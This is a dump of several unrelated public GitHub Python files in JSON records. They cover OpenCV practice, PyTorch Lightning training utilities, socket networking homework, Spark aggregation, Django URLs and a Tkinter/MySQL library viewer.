[cv2.IMWRITE_JPEG_QUALITY, 100])\r\n\r\nprint(m1.shape[0])\r\nprint(m1.shape[1])\r\nprint(m1.shape)\r\n\r\nprint(m2.shape[0]) #高\r\nprint(m2.shape[1]) #寬\r\nprint(m2.shape)\r\n\r\ncv2.imshow(\"Photo - 1\", m1)\r\ncv2.imshow(\"Photo - 1\", m2)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\nwrite(\"4.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 0])\r\ncv2.imwrite(\"3.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 50])\r\ncv2.imwrite(\"5.jpg\", m1, [cv2.IMWRITE_JPEG_QUALITY, 100]) \r\n\r\ncv2.imwrite(\"6.jpg\", m2, [cv2.IMWRITE_JPEG_QUALITY, 0])\r\ncv2.imwrite(\"7.jpg\", m2, [cv2.IMWRITE_JPEG_QUALITY, 50])\r\n\r\n'''\r\n\r\n# 讀攝影機\r\n'''\r\np1 = cv2.VideoCapture(0)\r\nwhile p1.isOpened()==True:\r\n ret, m1=p1.read() #有沒有讀到圖片 有兩個變數 True/False\r\n cv2.imshow(\"Photo - 1\", m1)\r\n if cv2.waitKey(33)!=-1: #每秒顯示幀數(FPS) eg. 每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break\r\ncv2.destroyAllWindows() \r\n'''\r\n# 讀影片\r\n'''\r\np1 = cv2.VideoCapture(\"dog.mp4\")\r\nprint(\"高:\", p1.get(4))\r\nprint(\"寬:\", p1.get(3))\r\nprint(\"總影格:\", p1.get(7))\r\nprint(\"FPS:\", p1.get(5))\r\n\r\np1.set(1,1234) #當前的影格\r\n\r\nwhile p1.isOpened()==True:\r\n ret, m1=p1.read() #有沒有讀到圖片 有兩個變數 True/False\r\n if ret==True:\r\n print(\"當前影格:\",p1.get(1))\r\n cv2.imshow(\"Photo - 1\", m1)\r\n if cv2.waitKey(33)!=-1: #每秒顯示幀數(FPS) eg. 每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break #從這格開始播放\r\n else: #播了這格就關起來 沒有else這兩行就可以繼續播\r\n break \r\ncv2.destroyAllWindows()\r\n'''\r\n# 把攝影機畫面存成影片 或是把影片擷取特定的影格 擷取一小段\r\n'''\r\np1 = cv2.VideoCapture(\"Asuka_magic.mp4\")\r\nprint(\"高:\", p1.get(4))\r\nprint(\"寬:\", p1.get(3))\r\nprint(\"總影格:\", p1.get(7))\r\nprint(\"FPS:\", p1.get(5))\r\nf = cv2.VideoWriter_fourcc(*'MP4V')\r\nw = int(p1.get(3)) # 傳回來的長寬會是小數 所以要int成整數下面才能用\r\nh = int(p1.get(4))\r\np2 = cv2.VideoWriter(\"part.mp4\", f, 40, (w, h))\r\ni = 0 # 設參數給後面只錄一小段用\r\nwhile p1.isOpened() == True:\r\n ret, m1 = p1.read() # 有沒有讀到圖片 有兩個變數 True/False\r\n if ret == True:\r\n i += 1\r\n if i > 2000 and i <= 2400:\r\n p2.write(m1)\r\n # 第三秒錄到第十秒 (30fps*3(第三秒) 所以是90) \r\n cv2.imshow(\"Image 1\", m1)\r\n if cv2.waitKey(33) != -1: # 每秒顯示幀數(FPS) eg. 每分鐘一千毫秒 除以30 約等於33.33 所以寫33\r\n break # 從這格開始播放\r\n # else: #播了這格就關起來 沒有else這兩行就可以繼續播\r\n # break\r\np2.release()\r\ncv2.destroyAllWindows()\r\n'''\r\n# 畫畫\r\n\r\nm1 = np.full(\r\n (150, 300, 3),\r\n (150, 250, 180),\r\n np.uint8\r\n)\r\ncv2.line(m1, (30, 40), (50, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (30, 20), (30, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (50, 20), (50, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 40), (90, 40), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 30), (90, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (70, 22), (70, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (90, 22), (90, 30), (0, 170, 0), 5)\r\ncv2.line(m1, (80, 20), (80, 40), (0, 170, 0), 5)\r\n\r\ncv2.circle(m1, (125, 30), 20, (0, 170, 0), 2) # 畫圓形\r\n\r\nm1 = Image.fromarray(m1)\r\n\r\nf = ImageFont.truetype(\"msgothic.ttc\", 50)\r\nImageDraw.Draw(m1).text((50, 70), \"齋藤飛鳥\", (0, 87, 87), f)\r\nm1 = np.array(m1)\r\n\r\ncv2.imshow(\"Image 1\", m1)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n\r\n'''\r\nm1 = cv2.imread(\"1.jpg\", 1)\r\n# m2=np.full(m1.shape,100,np.uint8)\r\n\r\n# m3=cv2.add(m1,m2) #加法最高是加到白色\r\n# m3=cv2.subtract(m1,m2)\r\n# m3=cv2.absdiff(m1,m2)\r\n# m3=cv2.divide(m1,m2)\r\n# m3=cv2.multiply(m3,m2)\r\n# m3=cv2.bitwise_not(m3,m2) #not 指令 色相相反\r\n# m3=m1+255\r\n# w=300\r\n# h=int((w/m1.shape[1])*m1.shape[0])\r\n# h=300\r\n# w=int((h/m1.shape[0])*m1.shape[1])\r\n\r\n#m2=cv2.flip(m1,-1)\r\n# d=cv2.getRotationMatrix2D((300,300)), 45, 1)\r\n# m2=cv2.warpAffine(m1, d, (500,500))\r\n\r\nm1 = cv2.imread(\"image/1.jpg\", 1)\r\nm2 = np.full(m1.shape,255,np.uint8)\r\n# m2[100:250,100:250]=m1[50:200,100:250]\r\n# m2[:,100:250]=m1[:,100:250] #高度都留著 切寬度而已\r\nm1[50:200,100:250]=255\r\n\r\ncv2.imshow(\"Image 1\", m1[:,:,2])\r\ncv2.imshow(\"Image 2\", m2)\r\n# cv2.imshow(\"Image 3\",m3)\r\ncv2.imshow(\"Image 2\", m1[50:200,100:250]) #裁切\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n'''\r\n","repo_name":"tamagoyaki-chiu/python_practice","sub_path":"2020-07-10/2020-07-10.py","file_name":"2020-07-10.py","file_ext":"py","file_size_in_byte":4843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10480052294","text":"from funcy_chain import getter\n\n\ndef test_long_path(Chain):\n data = [{\"a\": {\"b\": {\"c\": [1, 2, {\"d\": [3, {1: 2}]}]}}}]\n assert Chain(data).map(getter([\"a\", \"b\", \"c\", 2, \"d\", 1, 1])).value == [2]\n\n\ndef test_names(Chain):\n data = {\n \"user1\": {\n \"firstname\": \"Alice\",\n \"lastname\": \"Liddle\",\n },\n \"user2\": {\n \"firstname\": \"Bob\",\n \"lastname\": \"Kennedy\",\n },\n }\n names = (\n Chain(data).items().map(getter([1, \"lastname\"], [1, \"firstname\"])).sort().map(\", \".join)\n ).value\n assert names == [\"Kennedy, Bob\", \"Liddle, Alice\"]\n","repo_name":"taleinat/funcy-chain","sub_path":"test/test_getter.py","file_name":"test_getter.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"73809087772","text":"import cothread\nimport random\n\ndef worker(n):\n for i in range(25):\n print(f\"{n}\", end=\"\")\n cothread.Sleep(random.random() * 0.5) # suspend cothread \n print()\n\nthreads = []\nfor n in range(1, 5):\n t = cothread.Spawn(worker, n)\n threads.append(t)\n\ncothread.Yield() # wait for other cothreads\n\n# the cothread will terminate when we reach the end of the program\n# therefore we must wait for the cothreads to complete\nfor t in threads:\n t.Wait()\n","repo_name":"zaeemnajeeb/Python_training_diamond","sub_path":"src/36 EPICS/cothreads/01-yielding.py","file_name":"01-yielding.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35886682747","text":"\"\"\"Utilities to interact with pytorch-lightning.\n\"\"\"\n\nimport dataclasses\nimport logging\nimport os\nfrom typing import Any, Dict, List, Optional, Union\n\nimport pytorch_lightning\nimport pytorch_lightning.callbacks\nimport pytorch_lightning.plugins\n\nimport torch\nimport torch.distributed\nfrom pytorch_lightning.plugins.environments.cluster_environment import ClusterEnvironment\n\n\nlog = logging.getLogger(__name__)\n\n@dataclasses.dataclass\nclass TrainingConfiguration:\n \"\"\"Base configuration for training.\n\n Attributes\n ----------\n max_epochs : int\n Maximum number of epochs to train for.\n num_gpus : int\n Number of GPUs to use.\n mixed_precision : bool\n If `True`, uses 16-bit training.\n ligthning\n Additional arguments to pass when creating the pytorch-lightning trainer.\n \"\"\"\n max_epochs: int = 30\n num_gpus: int = 1\n mixed_precision: bool = False\n lightning: Dict[str, Any] = dataclasses.field(default_factory=dict)\n\n\ndef make_trainer(config: TrainingConfiguration, **kwargs) -> pytorch_lightning.Trainer:\n \"\"\"Creates a new `pytorch_lightning.Trainer` according to the given configuration.\n\n Parameters\n ----------\n config : TrainingConfiguration\n Configuration for the trainer to create.\n **kwargs\n Additional keyword arguments which are passed to the `pytorch_lightning.Trainer` constructor.\n \"\"\"\n callbacks = [\n pytorch_lightning.callbacks.ModelCheckpoint(\n save_top_k=-1,\n filename='epoch_{epoch}',\n auto_insert_metric_name=False),\n pytorch_lightning.callbacks.ModelCheckpoint(\n monitor='validation/loss',\n filename='epoch_{epoch}_vloss_{validation/loss:.3f}',\n auto_insert_metric_name=False,\n save_top_k=1),\n pytorch_lightning.callbacks.LearningRateMonitor(),\n ]\n\n if config.num_gpus > 0:\n callbacks.append(pytorch_lightning.callbacks.GPUStatsMonitor())\n\n trainer_kwargs = {\n **config.lightning\n }\n\n\n trainer_kwargs['gpus'] = config.num_gpus\n trainer_kwargs['max_epochs'] = config.max_epochs\n\n if config.num_gpus > 1:\n store_path = os.path.abspath('./torch_distributed_init.store')\n log.info(f'Using file-based distributed initialization at {store_path}')\n trainer_kwargs['accelerator'] = 'ddp'\n trainer_kwargs['plugins'] = DDPPlugin(init_method='file://' + store_path, find_unused_parameters=False)\n\n if hasattr(config, 'optim') and hasattr(config.optim, 'gradient_clip_norm'):\n if config.optim.gradient_clip_norm is not None:\n trainer_kwargs['gradient_clip_val'] = config.optim.gradient_clip_norm\n\n if config.mixed_precision:\n if config.num_gpus == 0:\n logging.getLogger(__name__).warn('Requested 16-bit precision but no GPUs. 16-bit precision training is not available on CPU, it has been disabled for now.')\n else:\n trainer_kwargs['precision'] = 16\n\n trainer_kwargs.update(kwargs)\n\n trainer = pytorch_lightning.Trainer(\n callbacks=callbacks,\n **trainer_kwargs)\n\n return trainer\n\n\nclass DDPPlugin(pytorch_lightning.plugins.DDPPlugin):\n \"\"\"Custom DDP plugin which allows for the specification of the torch distributed initialization method.\n \"\"\"\n def __init__(\n self,\n init_method: str = \"env://\",\n parallel_devices: Optional[List[torch.device]] = None,\n num_nodes: int = 1,\n cluster_environment: ClusterEnvironment = None,\n sync_batchnorm: bool = False,\n ddp_comm_state: Optional[object] = None,\n ddp_comm_hook: Optional[callable] = None,\n ddp_comm_wrapper: Optional[callable] = None,\n **kwargs: Union[Any, Dict[str, Any]],\n ) -> None:\n super().__init__(parallel_devices, num_nodes, cluster_environment, sync_batchnorm, ddp_comm_state, ddp_comm_hook, ddp_comm_wrapper, **kwargs)\n self.init_method = init_method\n\n def init_ddp_connection(self, global_rank: Optional[int]=None, world_size: Optional[int]=None) -> None:\n global_rank = global_rank if global_rank is not None else self.cluster_environment.global_rank()\n world_size = world_size if world_size is not None else self.cluster_environment.world_size()\n if not torch.distributed.is_initialized():\n log.info(f\"initializing ddp: GLOBAL_RANK: {global_rank}, MEMBER: {global_rank + 1}/{world_size}\")\n torch.distributed.init_process_group(\n self.torch_distributed_backend,\n init_method=self.init_method,\n rank=global_rank, world_size=world_size)\n","repo_name":"PrincetonLIPS/vitruvion","sub_path":"img2cad/lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"} +{"seq_id":"1571275504","text":"import socket\n\nsuccess = \"gatito uwu\"\nattempt = 1\nwhile(success != \"200: SUCCESS\"):\n host = \"jdiaz.inf.santiago.usm.cl\"\n port = 50008\n print(f\"\\n** NUEVO INTENTO: INTENTO NUMERO {attempt}**\")\n\n #obtención de datos de la imagen por udp\n msg = \"GET NEW IMG DATA\".encode()\n image_properties = []\n u1=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u1.sendto(msg, (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n response = u1.recvfrom(1024)[0].decode()\n res = response.strip().split()\n print(f\"Mensaje recidibo de {host}:{port} por UDP: {response}\")\n u1.close()\n print(\"Comenzando escritura de la imagen :o\")\n\n for i in res:\n image_properties.append(i.split(\":\")[1])\n\n #calculo del tamaño de la imagen\n buff = int(image_properties[1])*int(image_properties[2]) *3\n image_properties = [int(i) for i in image_properties]\n port = image_properties[3]\n\n if(len(image_properties) == 6): #este corresponde al primer input\n msg =f\"GET 1/2 IMG ID:{str(image_properties[0])}\"\n else:\n msg=f\"GET 1/3 IMG ID:{str(image_properties[0])}\" \n\n #obtencion primera parte de la imagen por tcp\n t1=socket.socket(socket.AF_INET,socket.SOCK_STREAM ) #conexion por tcp\n t1.connect((host,port))\n t1.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por TCP: {msg}\")\n part1 = t1.recvfrom(int(buff))[0]\n print(f\"Mensaje recidibo de {host}:{port} por TCP\")\n t1.close()\n\n #obtencion segunda parte de la imagen con udp\n if(len(image_properties) == 6): \n msg =f\"GET 2/2 IMG ID:{str(image_properties[0])}\"\n else:\n msg=f\"GET 2/3 IMG ID:{str(image_properties[0])}\"\n port =image_properties[4]\n u2=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u2.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n part2 = u2.recvfrom(buff)[0] \n print(f\"Mensaje recidibo de {host}:{port} por UDP\")\n u2.close()\n\n #obtencion tercera parte de la imagen con udp\n flag = False\n if(len(image_properties) == 7): \n flag = True\n port = image_properties[5]\n msg=f\"GET 3/3 IMG ID:{str(image_properties[0])}\"\n u3=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)\n u3.sendto(msg.encode(), (host,port))\n print(f\"Mensaje enviado a {host}:{port} por UDP: {msg}\")\n part3 = u3.recvfrom(buff)[0]\n print(f\"Mensaje recidibo de {host}:{port} por UDP\")\n u3.close()\n\n #mensaje de verificación por tcp\n port = image_properties[-1]\n t2=socket.socket(socket.AF_INET,socket.SOCK_STREAM ) #conexion por tcp\n t2.connect((host,port)) \n if flag:\n complete_image = part1 + part2 + part3\n complete_image= part1 + part2\n \n t2.sendto(complete_image, (host,port))\n print(f\"Mensaje enviado a {host}:{port} por TCP\")\n success = t2.recvfrom(1024)[0].decode()\n print(f\"Mensaje recibido de {host}:{port} por TCP: {success}\")\n print(F\"** FIN DE INTENTO {attempt}**\\n\")\n attempt += 1\n t2.close()\n\n\n#Escritura de la imagen\nname = f\"{image_properties[0]}.png\"\nimage = open(name, \"wb\")\nimage.write(complete_image)\nimage.close()\nprint(\"Imagen recibida y escritura finalizada :D\")","repo_name":"sofiwiwiwi/2023_01-Redes","sub_path":"Lab_1/tarea1.py","file_name":"tarea1.py","file_ext":"py","file_size_in_byte":3244,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38587735963","text":"import tensorflow as tf\ntensorflow_version = tf.__version__\ngpu_avilable = tf.test.is_gpu_available()\n\nprint(\"tensorflow version:\",tensorflow_version,\"\\tGPU avilable:\",gpu_avilable)\n\na = tf.constant([1.0,2.0],name=\"a\")\nb = tf.constant([1.0,2.0],name=\"b\")\nresult = tf.add(a,b,name=\"add\")\n\n# print(result)\n\n# import tensorflow as tf\n# print(tf.__version__)\n# print(tf.test.is_gpu_available())","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"test files/test_TensorFlow.py","file_name":"test_TensorFlow.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36645300409","text":"import ascii_art\nimport GUI2_LOGIN_SCREEN\nimport GUI2_REGISTER_SCREEN\n\nprint(ascii_art.logo)\n\nuser_choice = int(input('1) Already A Registered User ,Sign-In.\\n2) Not A User ,Register.\\nEnter Your Choice (1/2) : '))\nif user_choice == 1:\n GUI2_LOGIN_SCREEN.main()\nelif user_choice == 2:\n GUI2_REGISTER_SCREEN.main()\nelse:\n print('Invalid Choice')\n","repo_name":"Parshwa0409/Firebase-Classroom","sub_path":"GUI VERSION/GUI_MAIN.py","file_name":"GUI_MAIN.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9048983147","text":"from django.urls import path, include\nfrom . import views\nfrom .views import TaskList, TaskDetail, TaskCreate, TaskUpdate, TaskDelete, CustomLoginView\nfrom django.contrib.auth.views import LoginView, LogoutView\n\n\nurlpatterns = [\n # ==== path Converters ====\n # int: numbers\n # str: strings\n # path: whole url / \n # slug: hyphen-and_underscore_stuff\n # UUID: universally unique identifier\n # path('/', views.home, name='home'),\n # path('login/', CustomLoginView.as_view(), name='login'),\n path('register/', views.registerPage, name='register-page'),\n path('login/', views.loginPage, name='login-page'),\n # path('logout/', views.logoutPage, name='logout-page'),\n path('logout/', LogoutView.as_view(next_page='home'), name='logout-page'),\n\n\n path('', views.dashboard, name='dashboard'),\n path('auditor/', views.audit, name='auditor'),\n path('cs/', views.cs, name='cs'),\n path('inspector/', views.inspection, name='inspector'),\n path('task/', TaskList.as_view(), name='tasks'),\n path('task/', TaskDetail.as_view(), name='task-detail'),\n path('task-create', TaskCreate.as_view(), name='task-create'),\n path('task-update/', TaskUpdate.as_view(), name='task-update'),\n path('task-delete/', TaskDelete.as_view(), name='task-delete'),\n]","repo_name":"idfldev/Python-Examples","sub_path":"project_3/staff/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2496094735","text":"from torchvision import transforms\nfrom base.base_dataloader import BaseDataLoader\nfrom dataset.datasets import UAVDataset\nfrom utils import UAVCollator\nfrom tokenizers import Tokenizer\nfrom tokenizers.models import BPE\nfrom tokenizers.pre_tokenizers import Whitespace\nfrom tokenizers.trainers import BpeTrainer\n\nfrom tokenizers import (\n decoders,\n models,\n normalizers,\n pre_tokenizers,\n processors,\n trainers,\n Tokenizer,\n)\n\n\nclass UAVDataLoader(BaseDataLoader):\n \"\"\"\n MNIST data loading demo using BaseDataLoader\n \"\"\"\n\n def __init__(\n self,\n image_dir,\n questions_path,\n test_imgs,\n batch_size,\n shuffle=True,\n validation_split=0.0,\n num_workers=1,\n training=True,\n overfitting=False,\n generator=None,\n ):\n trsfm = transforms.Compose([transforms.Normalize((0.1307,), (0.3081,))])\n print(\"Building tokenizer..\")\n tokenizer = Tokenizer(BPE(unk_token=\"[UNK]\"))\n tokenizer.normalizer = normalizers.BertNormalizer(\n lowercase=True\n ) # Picked just to test\n tokenizer.pre_tokenizer = pre_tokenizers.BertPreTokenizer()\n trainer = BpeTrainer(special_tokens=[\"[PAD]\", \"[UNK]\", \"[SOS]\", \"[EOS]\"])\n tokenizer.train(files=[\"dataset/questions.txt\"], trainer=trainer)\n sos_token_id = tokenizer.token_to_id(\"[SOS]\")\n eos_token_id = tokenizer.token_to_id(\"[EOS]\")\n tokenizer.post_processor = processors.TemplateProcessing(\n single=f\"[SOS] $A [EOS]\",\n special_tokens=[(\"[SOS]\", sos_token_id), (\"[EOS]\", eos_token_id)],\n )\n print(\"Done! Tokenizer built!\")\n\n self.tokenizer = tokenizer\n self.vocab_size = tokenizer.get_vocab_size()\n self.collate_fn = UAVCollator(self.tokenizer)\n self.dataset = UAVDataset(\n image_dir,\n questions_path,\n test_imgs,\n transform=trsfm,\n training=training,\n overfitting=overfitting,\n )\n self.generator = generator\n\n super().__init__(\n self.dataset,\n batch_size,\n shuffle,\n validation_split,\n num_workers,\n collate_fn=self.collate_fn,\n generator=generator,\n )\n","repo_name":"RicRicci22/creativity_paper","sub_path":"data_loader/data_loaders.py","file_name":"data_loaders.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13171112159","text":"import sys, threading, time, logging, random\nsys.path.append('.')\nfrom pkg.breaker import addBreaker\n\n@addBreaker\ndef threading_semaphore():\n class ActivePool:\n def __init__(self):\n super(ActivePool, self).__init__()\n self.active = []\n self.lock = threading.Lock()\n def makeActive(self, name):\n with self.lock:\n self.active.append(name)\n logging.debug('Running: %s', self.active)\n def makeInactive(self, name):\n with self.lock:\n self.active.remove(name)\n logging.debug('Running: %s', self.active)\n\n def worker(s, pool):\n logging.debug('Waiting to join the pool')\n with s:\n name = threading.current_thread().getName()\n pool.makeActive(name)\n time.sleep(0.1)\n pool.makeInactive(name)\n\n logging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s (%(threadName)-2s) %(message)s',\n )\n pool = ActivePool()\n s = threading.Semaphore(2)\n for i in range(4):\n t = threading.Thread(\n target=worker,\n name=str(i),\n args=(s, pool),\n )\n t.start()\n pass\n\nif __name__ == \"__main__\":\n \"\"\"\n Sometimes it is useful to allow more than one worker access to a resource at a time,\n while still limiting the overall number.\n\n For example, a connection pool might support a fixed number of simultaneous connection,\n or a network application might support a fixed number of concurrent downloads.\n\n A `semaphore` is one way to manage those connections\n \n A real resource pool would allocate a connection or \n some other value to the newly active thread,\n and reclaim the value when the thread is done.\n \"\"\"\n threading_semaphore()","repo_name":"wellqin/USTC","sub_path":"PythonBasic/base_pkg/python-06-stdlib-review/chapter-10-ConcurrencyWithProcessThreadsCoroutines/10.3-threading/py_10_threadingLimitConcurrentAccessToResources.py","file_name":"py_10_threadingLimitConcurrentAccessToResources.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37058288043","text":"#!/usr/bin/env python3\n\nimport sys\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport scipy as sp\nimport numpy as np\nimport seaborn as sns\nimport scipy.cluster.hierarchy as hac\n\ndf=pd.read_csv(sys.argv[1], sep=\"\\t\", header=0, index_col=0)\n#print(df)\narray=np.array(df)\n#print(array)\ndt=hac.linkage(df,'average')\n#print(dt)\nsortedarray=hac.leaves_list(dt)\n#print(sortedarray)\nnew_list=[]\nfor i in sortedarray:\n new_list.append(array[i])\nnewarray=np.asarray(new_list)\n#print(newarray)\n\n# sns.heatmap(newarray)\n# plt.show()\n\ncell_type=np.transpose(newarray)\ndcell=hac.linkage(cell_type,'average')\nsortedarraycell=hac.leaves_list(dcell)\nnew_list_cell=[]\nfor a in sortedarraycell:\n new_list_cell.append(cell_type[a])\nnewarray_cell_type=np.asarray(new_list_cell)\ncell_type_transposeback=np.transpose(newarray_cell_type)\n\n\nnames=[\"CFU\",\"poly\",\"unk\",\"int\",\"mys\",\"mid\"]\ncolumns=df.columns\ncelltypecolumn=[]\n# for m in sortedarray:\n# genescolumn.append(columns[m])\nfor n in sortedarraycell:\n celltypecolumn.append(columns[n])\n\n\n# fig,ax=plt.subplots(sharey=True)\n# hac.dendrogram(dcell,ax=ax)\n# plt.xlabel(\"Cell type\")\n# plt.ylabel(\"Differentiation\")\n# ax.set_xticklabels([names[1],names[2],names[0],names[4],names[3],names[5]])\n# plt.tight_layout()\n# fig.savefig(\"dendrogram\")\n#\n# plt.show()\n# quit()\n#print(sortedarray)\nfig,(ax1,ax2,ax3)=plt.subplots(ncols=3)\nsns.heatmap(array, ax=ax1)\nsns.heatmap(newarray, ax=ax2)\nsns.heatmap(cell_type_transposeback,ax=ax3)\n\nax1.set_xlabel(\"cell type\")\nax2.set_xlabel(\"cell type\")\nax3.set_xlabel(\"cell type\")\nax1.set_xticklabels(columns)\nax1.set_ylabel(\"Genes\")\nax2.set_ylabel(\"Genes\")\nax3.set_ylabel(\"Genes\")\nax2.set_xticklabels(columns)\nax1.set_title(\"Nonsorted\")\nax2.set_title(\"Genes sorted\")\nax3.set_title(\"Genes & Cell type sorted\")\nax3.set_xticklabels(celltypecolumn)\n\nplt.tight_layout()\n\nfig.savefig(\"heatplots\")\nplt.show()\n\n# quit()\n# plt.pcolor(df)\n# plt.yticks(np.arange(0.5, len(df.index), 1), df.index)\n# plt.xticks(np.arange(0.5, len(df.columns), 1), df.columns)\n# plt.show()","repo_name":"Raquelmeur/qbb2019-answer","sub_path":"week8/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19787638001","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.types import StructType,StructField, IntegerType, FloatType\nfrom pyspark.sql import functions as func\n\nspark = SparkSession.builder.appName(\"TotalSpent\").getOrCreate()\n\nschema = StructType([\n StructField(\"ID\",IntegerType(),True),\n StructField(\"item_id\",IntegerType(),True),\n StructField(\"spent\",FloatType(),True)\n])\n\ndf = spark.read.schema(schema).csv(\"data/customer-orders.csv\")\ntotalByCustomer = df.groupBy(\"ID\").agg(func.round(func.sum(\"spent\"),2).alias(\"total_spent\")).show()\n\nspark.stop()\n\n","repo_name":"emrhnksck/learn-spark","sub_path":"total-spent-dataframe.py","file_name":"total-spent-dataframe.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5113679840","text":"import random\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nimport requests\nimport config\n# import reset\n\n# Authorize Google Sheets\ntry:\n\tscope = [\"https://spreadsheets.google.com/feeds\", \"https://www.googleapis.com/auth/drive\"]\n\tcredentials = ServiceAccountCredentials.from_json_keyfile_name(config.credentials, scope)\n\tgc = gspread.authorize(credentials)\nexcept OSError as e:\n\tprint(\"JSON file with Google account credentials not found!\")\n\tprint(\"Make sure you've followed the README instructions and added the filepath of your credentials file to config.py\")\n\texit(1)\n\n# Open sheets\ndatasheet = gc.open(config.spreadsheet).worksheet(\"datasheet\")\n\n# Get question and options from current index\n\nfor x in range(2, 50):\n print(x) \n\n if datasheet.cell(x, 1).value > \"\":\n prasad_date = datasheet.cell(x, 1).value \n prasad_count = datasheet.cell(x, 2).value\n print(\"date:\", prasad_date) \n print(\"count:\", prasad_count) \n\n# if prasad_date == \"\":\n#\tprint(\"No questions found in the Google sheet!\")\n#\texit(1)\n# else","repo_name":"ranjithp361/hpow","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2336228033","text":"from tkinter import *\r\n\r\nimport mysql.connector as msql\r\nfrom tkinter import messagebox\r\n\r\nmycon=msql.connect(host='localhost', user='root', passwd='root', database='lib')\r\n\r\ncur=mycon.cursor()\r\ndef View(): \r\n global bookInfo1 ,bookInfo2, bookInfo3, bookInfo4, Canvas1, mycon, cur, bookTable, root\r\n bookTable = \"books\"\r\n root = Tk()\r\n root.title(\"Library\")\r\n root.minsize(width=400,height=400)\r\n root.geometry(\"600x500\")\r\n Canvas1 = Canvas(root) \r\n Canvas1.config(bg=\"#12a4d9\")\r\n Canvas1.pack(expand=True,fill=BOTH)\r\n headingFrame1 = Frame(root,bg=\"#FFBB00\",bd=5)\r\n headingFrame1.place(relx=0.25,rely=0.1,relwidth=0.5,relheight=0.13)\r\n headingLabel = Label(headingFrame1, text=\"View Books\", bg='black', fg='white', font = ('Courier',15))\r\n headingLabel.place(relx=0,rely=0, relwidth=1, relheight=1)\r\n labelFrame = Frame(root,bg='black')\r\n labelFrame.place(relx=0.1,rely=0.3,relwidth=0.8,relheight=0.5)\r\n y = 0.25\r\n Label(labelFrame, text=\"%-10s%-40s%-30s%-20s\"%('BID','Title','Author','Status'),\r\n bg='black',fg='white').place(relx=0.07,rely=0.1)\r\n Label(labelFrame, text = \"----------------------------------------------------------------------------\",bg='black',fg='white').place (relx=0.05,rely=0.2)\r\n getBooks = \"select * from \"+bookTable\r\n try:\r\n cur.execute(getBooks)\r\n for i in cur:\r\n Label(labelFrame,text=\"%-10s%-30s%-30s%-20s\"%(i[0],i[1],i[2],i[3]) ,bg='black', fg='white').place(relx=0.07,rely=y)\r\n y += 0.1\r\n mycon.commit()\r\n except:\r\n messagebox.showinfo(\"Error\",\"Failed to fetch files from database\")\r\n def export():\r\n ex='select * from books'\r\n cur.execute(ex)\r\n l=cur.fetchall()\r\n fh=open(\".//Exports//data.txt\",\"w\")\r\n for i in l:\r\n i=str(i)+'\\n'\r\n fh.write(str(i))\r\n messagebox.showinfo(\"Success\",\"File exported to CS_Project/Exports/data.txt\")\r\n quitBtn = Button(root,text=\"Quit\",bg='#f7f1e3', fg='black', command=root.destroy)\r\n quitBtn.place(relx=0.6,rely=0.9, relwidth=0.18,relheight=0.08)\r\n exBtn = Button(root,text=\"Export\",bg='#f7f1e3', fg='black', command=export)\r\n exBtn.place(relx=0.2,rely=0.9, relwidth=0.18,relheight=0.08) \r\n 